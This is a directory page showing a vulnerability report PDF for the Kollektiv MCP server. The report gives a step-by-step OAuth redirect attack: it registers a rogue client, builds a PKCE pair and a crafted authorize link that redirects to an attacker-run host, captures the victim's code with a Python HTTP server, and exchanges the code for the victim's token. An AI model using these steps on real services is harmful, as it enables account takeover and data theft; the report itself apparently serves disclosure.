Skip to main content
Glama
alexander-zuev

Kollektiv | Your private LLM knowledgebase

Kollektiv Vulnerability.md1.69 kB
# kollektiv_vulnerability.pdf ## Metadata - PDFFormatVersion=1.3 - IsLinearized=false - IsAcroFormPresent=false - IsXFAPresent=false - IsCollectionPresent=false - IsSignaturesPresent=false - Producer=macOS 版本14.0(版号23A344) Quartz PDFContext - CreationDate=D:20250515053113Z00'00' - ModDate=D:20250515053113Z00'00' ## Contents ### Page 1 1. First, use the register api to register a evil client_id 2. Then we can use a javascript code to generate a pair of PKCE code, like below { 11 code_verifier: 'zJu_u20q542vkqHg790nzV4VkflNY023Qzx1ENFRZqk', 12 code_challenge : 'ogH32ysf0wlQY8KKJOGf1s5IWwtKoa1eEq - bMVTbqpg' 13 } 3. Then we replace the client_id,redirect_uri,code_challenge to generate an evil link. This is the original link https://mcp.thekollektiv.ai/authorize?response_type=code&client_id =q8WxVGfcGqFUG0vd&code_challenge=4kZ8ithQ_6gxonAkD_bV6M i8PC3bHhQEGIxGxd1rDVM&code_challenge_method=S256&redirect _uri=http%3A%2F%2F127.0.0.1%3A6274%2Foauth%2Fcallback And below one is the evil link https://mcp.thekollektiv.ai/authorize?response_type=code&client_id =HgYqLWh9OmedD8LJ&code_challenge=ogH32ysf0wlQY8KKJOGf1 s5IWwtKoa1eEq -,### Page 2 bMVTbqpg&code_challenge_method=S256&redirect_uri=http%3A%2 F%2Fexp.azraelxuemo.cn%3A9876%2Foauth%2Fcallback 4. Start a http server to receive the code Python3 - m http.server 9876 5. Send the link to victim Once the victim click the link, we can get the code 6. Get the token Replace the code, code_verifier, redirect_uri, client_id And we can get a valid access_token, just as the victim’s identity Then when can use the MCP Client tool to visit victim’s resource,### Page 3

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/alexander-zuev/kollektiv-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server